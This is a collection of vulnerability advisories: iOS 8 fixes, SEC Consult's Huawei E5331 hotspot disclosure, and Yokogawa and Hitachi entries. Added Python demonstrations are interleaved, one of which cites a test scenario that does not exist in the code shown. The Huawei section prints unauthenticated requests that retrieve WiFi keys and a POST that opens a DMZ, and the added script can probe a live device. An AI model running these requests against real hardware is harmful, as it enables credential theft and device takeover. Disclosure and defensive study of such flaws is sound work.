Some of its output was inferable from user space, allowing bypass of
the hardening measures. This issue was addressed by using a
cryptographically secure algorithm.
CVE-ID
CVE-2014-4422 : Tarjei Mandt of Azimuth Security
Libnotify
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An out-of-bounds write issue existed in Libnotify. This
issue was addressed through improved bounds checking.
CVE-ID
CVE-2014-4381 : Ian Beer of Google Project Zero
Lockdown
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A device can be manipulated into incorrectly presenting the
home screen when the device is activation locked
Description: An issue existed with unlocking behavior that caused a
device to proceed to the home screen even if it should still be in an
activation locked state. This was addressed by changing the
information a device verifies during an unlock request.
CVE-ID
CVE-2014-1360
Mail
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Login credentials can be sent in plaintext even if the
server has advertised the LOGINDISABLED IMAP capability
Description: Mail sent the LOGIN command to servers even if they had
advertised the LOGINDISABLED IMAP capability. This issue is mostly a
concern when connecting to servers that are configured to accept non-
encrypted connections and that advertise LOGINDISABLED. This issue
was addressed by respecting the LOGINDISABLED IMAP capability.
CVE-ID
CVE-2014-4366 : Mark Crispin
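The LOGINDISABLED rule (RFC 3501 section 6.2.3: a client must not issue LOGIN while the server advertises LOGINDISABLED) is easy to get wrong in exactly the way described above. The following is an added example, not Apple Mail code and not from the advisory: a scripted stand-in for an IMAP server (assumption: a plain Python object, no socket) plus a client login routine whose `respect_logindisabled=False` path reproduces the pre-iOS 8 behaviour, sending LOGIN in the clear, while the default path upgrades with STARTTLS and re-queries capabilities before sending credentials. Tag names and the server responses are constructed for the example.

```python
import re


def parse_capabilities(line):
    """Parse an untagged IMAP CAPABILITY response into an upper-cased set.

    '* CAPABILITY IMAP4rev1 STARTTLS LOGINDISABLED'
        -> {'IMAP4REV1', 'STARTTLS', 'LOGINDISABLED'}
    """
    m = re.match(r"\*\s+CAPABILITY\s+(.+)", line.strip(), re.IGNORECASE)
    if not m:
        raise ValueError("not a CAPABILITY response: %r" % line)
    return {tok.upper() for tok in m.group(1).split()}


def _quote(s):
    """IMAP quoted-string: backslash and double quote must be escaped."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


class ScriptedServer:
    """Constructed stand-in for an IMAP server (no real socket or TLS).

    It advertises one capability list before STARTTLS and, optionally, a
    different one afterwards, and records every command together with a
    flag saying whether TLS was already active when the command arrived.
    """

    def __init__(self, plain_caps, tls_caps=None):
        self.plain_caps = [c.upper() for c in plain_caps]
        self.tls_caps = [c.upper() for c in (tls_caps or plain_caps)]
        self.tls = False
        self.log = []  # list of (command, sent_over_tls)

    def send(self, command):
        self.log.append((command, self.tls))
        verb = command.split()[1].upper()
        if verb == "CAPABILITY":
            caps = self.tls_caps if self.tls else self.plain_caps
            return "* CAPABILITY " + " ".join(caps)
        if verb == "STARTTLS":
            if self.tls or "STARTTLS" not in self.plain_caps:
                return "x BAD STARTTLS not available"
            self.tls = True  # the TLS handshake would happen here
            return "x OK Begin TLS negotiation now"
        if verb == "LOGIN":
            return "x OK LOGIN completed"
        return "x BAD unknown command"


def imap_login(server, user, password, respect_logindisabled=True):
    """Log in and return the server's command log.

    respect_logindisabled=False reproduces the vulnerable behaviour: LOGIN
    goes out in plaintext even though the server advertised LOGINDISABLED.
    """
    caps = parse_capabilities(server.send("a1 CAPABILITY"))
    if "LOGINDISABLED" in caps and respect_logindisabled:
        if "STARTTLS" not in caps:
            raise PermissionError(
                "LOGINDISABLED advertised and no STARTTLS offered; "
                "refusing to send plaintext credentials")
        server.send("a2 STARTTLS")
        # Capabilities must be re-queried after STARTTLS: the pre-TLS list
        # came over an untrusted channel and may differ.
        caps = parse_capabilities(server.send("a3 CAPABILITY"))
        if "LOGINDISABLED" in caps:
            raise PermissionError(
                "LOGIN still disabled after STARTTLS; use AUTHENTICATE instead")
    server.send("a4 LOGIN %s %s" % (_quote(user), _quote(password)))
    return list(server.log)


if __name__ == "__main__":
    srv = ScriptedServer(["IMAP4rev1", "STARTTLS", "LOGINDISABLED"],
                         ["IMAP4rev1", "AUTH=PLAIN"])
    for cmd, over_tls in imap_login(srv, "alice", "hunter2"):
        print("TLS" if over_tls else "PLAIN", cmd)
```

The interesting case for a mail client is the third scenario in the test: a server that advertises LOGINDISABLED on a plaintext port without STARTTLS. The fixed client must fail closed there rather than fall back to LOGIN, which is the fallback that leaked credentials.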
Mail
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A person with physical access to an iOS device may
potentially read email attachments
Description: A logic issue existed in Mail's use of Data Protection
on email attachments. This issue was addressed by properly setting
the Data Protection class for email attachments.
CVE-ID
CVE-2014-1348 : Andreas Kurtz of NESO Security Labs
Profiles
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Voice Dial is unexpectedly enabled after upgrading iOS
Description: Voice Dial was enabled automatically after upgrading
iOS. This issue was addressed through improved state management.
CVE-ID
CVE-2014-4367 : Sven Heinemann
Safari
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: User credentials may be disclosed to an unintended site via
autofill
Description: Safari may have autofilled user names and passwords
into a subframe from a different domain than the main frame. This
issue was addressed through improved origin tracking.
CVE-ID
CVE-2013-5227 : Niklas Malmgren of Klarna AB
Safari
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: An attacker with a privileged network position may intercept
user credentials
Description: Saved passwords were autofilled on http sites, on https
sites with broken trust, and in iframes. This issue was addressed by
restricting password autofill to the main frame of https sites with
valid certificate chains.
CVE-ID
CVE-2014-4363 : David Silver, Suman Jana, and Dan Boneh of Stanford
University working with Eric Chen and Collin Jackson of Carnegie
Mellon University
Sandbox Profiles
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Apple ID information is accessible by third-party apps
Description: An information disclosure issue existed in the third-
party app sandbox. This issue was addressed by improving the third-
party sandbox profile.
CVE-ID
CVE-2014-4362 : Andreas Kurtz of NESO Security Labs and Markus
Troßbach of Heilbronn University
Settings
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Text message previews may appear at the lock screen even
when this feature is disabled
Description: An issue existed in the previewing of text message
notifications at the lock screen. As a result, the contents of
received messages would be shown at the lock screen even when
previews were disabled in Settings. The issue was addressed through
improved observance of this setting.
CVE-ID
CVE-2014-4356 : Mattia Schirinzi from San Pietro Vernotico (BR),
Italy
syslog
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A local user may be able to change permissions on arbitrary
files
Description: syslogd followed symbolic links while changing
permissions on files. This issue was addressed through improved
handling of symbolic links.
CVE-ID
CVE-2014-4372 : Tielei Wang and YeongJin Jang of Georgia Tech
Information Security Center (GTISC)
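The syslogd issue above is the classic symlink race: a privileged daemon changes the mode of a path a less privileged user can control, and chmod(2) follows links. The block below is an added example, not Apple's syslogd code: it shows the vulnerable pattern beside a hardened one that opens with O_NOFOLLOW and then uses fchmod on the descriptor it actually opened, so there is no check-then-act window. The file names and the temporary directory are constructed for the demonstration; it assumes a POSIX system where O_NOFOLLOW is available.

```python
import errno
import os
import stat
import tempfile


def chmod_following_links(path, mode):
    """The vulnerable pattern: chmod(2) resolves symlinks, so if a local user
    can plant a link at `path`, the mode change lands on the link's target."""
    os.chmod(path, mode)


def chmod_no_follow(path, mode):
    """Hardened variant: O_NOFOLLOW makes the kernel reject a symlink at the
    final path component (ELOOP on Linux/macOS, EMLINK on some BSDs); fchmod
    then acts on the descriptor we opened, not on a path that may change."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_NONBLOCK)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise OSError(errno.EINVAL, "refusing to chmod a non-regular file", path)
        os.fchmod(fd, mode)
    finally:
        os.close(fd)


def demo():
    """Replay the attack in a temp dir (constructed scenario). Returns
    (victim mode after the vulnerable call, hardened call refused?,
     victim mode after the hardened call, mode of a regular file after the
     hardened call)."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim")  # stands in for a sensitive file
        with open(victim, "w") as f:
            f.write("secret\n")
        os.chmod(victim, 0o600)
        planted = os.path.join(d, "daemon.log")  # path the daemon will chmod
        os.symlink(victim, planted)  # attacker plants a link there first

        chmod_following_links(planted, 0o666)
        after_vuln = stat.S_IMODE(os.stat(victim).st_mode)

        os.chmod(victim, 0o600)  # reset for the second run
        try:
            chmod_no_follow(planted, 0o666)
            refused = False
        except OSError as e:
            refused = e.errno in (errno.ELOOP, errno.EMLINK)
        after_fixed = stat.S_IMODE(os.stat(victim).st_mode)

        regular = os.path.join(d, "real.log")  # the legitimate case still works
        open(regular, "w").close()
        chmod_no_follow(regular, 0o640)
        regular_mode = stat.S_IMODE(os.stat(regular).st_mode)
        return after_vuln, refused, after_fixed, regular_mode


if __name__ == "__main__":
    print(tuple(oct(x) if isinstance(x, int) else x for x in demo()))
```

A daemon that must also handle files in directories writable by other users should go further and open the directory first, then use openat with O_NOFOLLOW relative to that descriptor, since a link in a parent component is not covered by O_NOFOLLOW.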
Weather
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Location information was sent unencrypted
Description: An information disclosure issue existed in an API used
to determine local weather. This issue was addressed by changing
APIs.
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A malicious website may be able to track users even when
private browsing is enabled
Description: A web application could store HTML 5 application cache
data during normal browsing and then read the data during private
browsing. This was addressed by disabling access to the application
cache when in private browsing mode.
CVE-ID
CVE-2014-4409 : Yosuke Hasegawa (NetAgent Co., Ltd.)
WebKit
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: Visiting a maliciously crafted website may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in WebKit.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2013-6663 : Atte Kettunen of OUSPG
CVE-2014-1384 : Apple
CVE-2014-1385 : Apple
CVE-2014-1387 : Google Chrome Security Team
CVE-2014-1388 : Apple
CVE-2014-1389 : Apple
CVE-2014-4410 : Eric Seidel of Google
CVE-2014-4411 : Google Chrome Security Team
CVE-2014-4412 : Apple
CVE-2014-4413 : Apple
CVE-2014-4414 : Apple
CVE-2014-4415 : Apple
WiFi
Available for: iPhone 4s and later,
iPod touch (5th generation) and later, iPad 2 and later
Impact: A device may be passively tracked by its WiFi MAC address
Description: An information disclosure existed because a stable MAC
address was being used to scan for WiFi networks. This issue was
addressed by randomizing the MAC address for passive WiFi scans.
Note:
iOS 8 contains changes to some diagnostic capabilities.
For details, please consult http://support.apple.com/kb/HT6331
iOS 8 now permits devices to untrust all previously trusted
computers. Instructions can be found at
http://support.apple.com/kb/HT5868
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "8".
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
| VAR-201403-0571 | No CVE | Huawei E5331 has multiple vulnerabilities |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Huawei E5331 MiFi mobile hotspot is a 3G router device. Huawei E5331 has information disclosure and security bypass vulnerabilities that allow unauthenticated remote attackers to retrieve configuration information by requesting certain web interface URLs and to change the device configuration by submitting specially crafted POST requests. Huawei E5331 is a 3G wireless network card from Huawei, China.
A security bypass vulnerability and an information disclosure vulnerability exist in Huawei E5331. Attackers can use these vulnerabilities to obtain sensitive information or gain access to devices. Huawei E5331 software version 21.344.11.00.414 is vulnerable; other versions may also be affected.
SEC Consult Vulnerability Lab Security Advisory < 20140307-0 >
=======================================================================
title: Unauthenticated access & manipulation of settings
product: Huawei E5331 MiFi mobile hotspot
vulnerable version: Software version 21.344.11.00.414
fixed version: Software version 21.344.27.00.414
impact: High
homepage: http://www.huawei.com
found: 2013-12-06
by: J. Greil
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Huawei E5331 Mobile WiFi is a high-speed packet access mobile hotspot. It is a
multi-mode wireless terminal for SOHO (Small Office and Home Office) and
business professionals.
You can connect the E5331 with the USB interface of a computer, or connect the
E5331 with the Wi-Fi. In the service area of the HSPA+/HSPA/UMTS/EDGE/GPRS/GSM
network, you can surf the Internet and send/receive messages/emails
cordlessly. The E5331 is fast, reliable, and easy to operate. Thus, mobile
users can experience many new features and services with the E5331. These
features and services will enable a large number of users to use the E5331 and
the average revenue per user (ARPU) of operators will increase substantially."
source:
http://www.huaweidevice.com/worldwide/productFeatures.do?pinfoId=3272&directoryId=5009&treeId=3619&tab=0
Business recommendation:
------------------------
All discovered vulnerabilities can be exploited without authentication and
therefore pose a high security risk.
The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the device. It is assumed that further
vulnerabilities exist within this product!
The recommendation of SEC Consult is to perform follow-up security tests of
this device and similar devices.
Vulnerability overview/description:
-----------------------------------
An unauthenticated attacker can read all settings of the device (e.g.
WLAN passwords in clear text or IMEI information of the SIM card) and
even manipulate all settings in the web administration interface! This also
works when the "Enable firewall" feature is set in "Firewall Switch" settings
of the web interface.
This can even be exploited remotely via Internet depending on the mobile
operator setup. E.g. if the operator allows incoming connections for mobile
networks, the web interface would be accessible and exploitable publicly.
Otherwise those settings can be manipulated via CSRF attacks too. The DNS name
"mobilewifi.home" can be used regardless of the IP address settings.
Proof of concept:
-----------------
An attacker simply needs to access certain URLs of the web interface in order
to receive the configuration. No authentication is needed!
URL for retrieving wireless passwords / PSK in clear text:
http://mobilewifi.home/api/wlan/security-settings
XML response:
<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>NONE</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>AES</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>XXXXX</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>
Further interesting URLs to retrieve information from (not complete):
http://mobilewifi.home/api/wlan/wps (WPS pin)
http://mobilewifi.home/api/security/dmz (DMZ host settings)
http://mobilewifi.home/api/pin/simlock (enable SIM lock)
http://mobilewifi.home/api/wlan/host-list (connected wireless clients)
http://mobilewifi.home/api/device/information (IMEI, MAC, etc)
[...]
In order to change settings it is also simply possible to issue POST requests
to the specific URLs. E.g. change the "DMZ Settings" in order to make internal
clients (client IP addresses can be retrieved through the host-list from above)
reachable from the outside:
POST /api/security/dmz HTTP/1.1
Host: mobilewifi.home

<?xml version="1.0" encoding="UTF-8"?><request><DmzStatus>1</DmzStatus><DmzIPAddress>A.B.C.D</DmzIPAddress></request>
All those requests can either be issued via CSRF or also from the Internet, if
the web interface of the device is reachable (depends on the mobile operator
settings).
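To turn the proof of concept above into a repeatable check, the following added example (not SEC Consult's or Huawei's code) parses the `/api/wlan/security-settings` response format shown in the advisory, reports the key material an unauthenticated caller should never receive, builds the `/api/security/dmz` request body in the same format, and offers a live probe against the hotspot. The sample XML is constructed from the advisory's listing with the PSK redacted as there; `probe()` assumes that patched firmware answers with something other than a populated `<response>` document, which the advisory does not specify, so treat an empty result from it as "no leak observed" rather than proof of a fix.

```python
import ipaddress
import urllib.request
import xml.etree.ElementTree as ET

# Constructed sample: the response format from the advisory, PSK redacted.
SAMPLE_SECURITY_SETTINGS = b"""<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>NONE</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>AES</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>XXXXX</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>"""

# Fields that carry key material. Stale WEP keys count too: the sample runs
# WPA2-PSK yet still returns four WEP keys.
SECRET_FIELDS = ("WifiWpapsk", "WifiWepKey1", "WifiWepKey2",
                 "WifiWepKey3", "WifiWepKey4")


def parse_response(body):
    """Flatten a <response> document into {tag: text}; anything else is an error."""
    root = ET.fromstring(body)
    if root.tag != "response":
        raise ValueError("unexpected root element %r" % root.tag)
    return {child.tag: (child.text or "").strip() for child in root}


def disclosed_secrets(settings):
    """Return only the populated secret fields from a parsed response."""
    return {k: settings[k] for k in SECRET_FIELDS if settings.get(k)}


def build_dmz_request(ip, enable=True):
    """Body for POST /api/security/dmz in the format the advisory shows.
    The address is validated locally so a typo never reaches the device."""
    ipaddress.IPv4Address(ip)  # raises ValueError on anything that is not an IPv4 address
    req = ET.Element("request")
    ET.SubElement(req, "DmzStatus").text = "1" if enable else "0"
    ET.SubElement(req, "DmzIPAddress").text = ip
    return b'<?xml version="1.0" encoding="UTF-8"?>' + ET.tostring(req)


def probe(base_url="http://mobilewifi.home", timeout=5):
    """Live, read-only check (needs network reachability to the hotspot):
    request the security settings with no session at all. A non-empty dict
    means the device handed key material to an unauthenticated client.
    Assumption: patched firmware does not answer with a populated <response>."""
    req = urllib.request.Request(base_url + "/api/wlan/security-settings")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        body = resp.read()
    try:
        return disclosed_secrets(parse_response(body))
    except (ET.ParseError, ValueError):
        return {}


if __name__ == "__main__":
    print(disclosed_secrets(parse_response(SAMPLE_SECURITY_SETTINGS)))
    print(build_dmz_request("192.168.1.100").decode())
```

Note that `build_dmz_request` only produces the body; actually sending it reconfigures the device, which is the manipulation the advisory warns about, so use it solely against hardware you are authorised to test.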
Vulnerable / tested versions:
-----------------------------
The following version of the device has been tested which was the latest
version available at the time of identification of the flaw (the automatic
update feature did not supply any new version):
Software version: 21.344.11.00.414
Web UI version: 11.001.07.00.03
Vendor contact timeline:
------------------------
2013-12-11: Contacting vendor through psirt@huawei.com
2013-12-12: Reply from vendor
2013-12-18: Vendor requests some further details, sending answer
2014-01-09: Vendor: problem will be resolved in new firmware version
2014-01-14: Patch is planned for 6th March 2014
2014-03-07: SEC Consult releases coordinated security advisory
Solution:
---------
According to the vendor the following firmware release fixes the identified
problems:
* Software version 21.344.27.00.414
It contains the following improvements according to the vendor:
1. Users cannot obtain or set any device parameter without logging in.
2. Added server-side authentication to discard illegitimate packets.
The firmware can be downloaded from here:
http://consumer.huawei.com/en/support/downloads/index.htm
The item is called: E5331Update_21.344.27.00.414.B757
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
EOF J. Greil / @2014
| VAR-201403-0448 | CVE-2014-0784 |
Yokogawa CENTUM CS3000 'BKBCopyD.exe' Stack Buffer Overflow Vulnerability
Related entries in the VARIoT exploits database: VAR-E-201403-0243 |
CVSS V2: 8.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in BKBCopyD.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet. Yokogawa CENTUM CS3000 is a production control system. It is prone to a stack-based buffer-overflow vulnerability because BKBCopyD.exe fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Successful exploits may allow an attacker to execute arbitrary code with system privileges. Failed attempts will likely cause a denial-of-service condition.
Yokogawa CENTUM CS3000 R3.08.50 was confirmed vulnerable; other releases up to and including R3.09.50 are also affected. Yokogawa CENTUM CS is a large-scale production control system from Japan's Yokogawa Electric Corporation (Yokogawa), used in plants across many industrial sectors.
| VAR-201403-0707 | No CVE | Unknown Cross-Site Scripting Vulnerability in Hitachi JP1 / Integrated Management-Service Support |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Hitachi JP1/Integrated Management is a solution that monitors business execution and centrally manages system components such as the OS and applications.
Unspecified input to a related view is not sufficiently filtered before being returned to Service Support users. Remote attackers can construct malicious URIs and lure users into opening them in order to steal sensitive cookies, hijack sessions or perform malicious operations on the client. Hitachi JP1/Integrated Management - Service Support is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The following versions are vulnerable:
Hitachi JP1/Integrated Management - Service Support versions 09-50 through 09-50-06
Hitachi JP1/Integrated Management - Service Support versions 10-00 through 10-00-03
Hitachi JP1/Integrated Management - Service Support version 10-10
Note: This issue affects Hitachi JP1/Integrated Management - Service Support for Windows platforms
| VAR-201403-0716 | No CVE | Hitachi JP1 / File Transmission Server / FTP Security Bypass Vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Hitachi JP1/File Transmission Server/FTP is a file transfer service program.
Hitachi JP1/File Transmission Server/FTP fails to properly restrict directory access, allowing remote attackers to reach directories that should be off limits. Hitachi JP1/File Transmission Server/FTP is prone to a security-bypass vulnerability.
An attacker may leverage this issue to bypass certain security restrictions and gain unauthorized access.